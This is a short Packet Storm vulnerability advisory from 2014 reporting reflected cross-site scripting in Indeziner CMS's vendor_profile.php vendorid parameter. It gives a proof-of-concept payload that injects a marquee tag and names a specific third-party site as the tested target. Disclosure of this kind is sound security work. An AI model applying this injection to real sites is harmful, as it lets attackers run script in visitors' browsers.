Indeziner CMS Cross Site Scripting

2014-04-19T00:00:00
ID PACKETSTORM:126240
Type packetstorm
Reporter Renzi
Modified 2014-04-19T00:00:00

Description

                                        
                                            `# Cross Site Scripting on INDEZINER CMS  
# Risk: Low  
# CWE number: CWE-79  
# Date: 19/04/2014  
# Vendor: indeziner.com  
# Author: Felipe Gabriel Renzi  
# Contact: renzi@linuxmail.org  
# Tested on Windows 8 pro  
# Vulnerable File: vendor_profile.php  
# Exploit: http://host/vendor_profile.php?vendorid=[xss]  
# PoC:   
- Target: http://excitefind.com  
- Vuln. File: /vendor_profile.php?vendorid=  
- Exploit: "><marquee>Vulnerable</marquee>  
  
  
  
  
`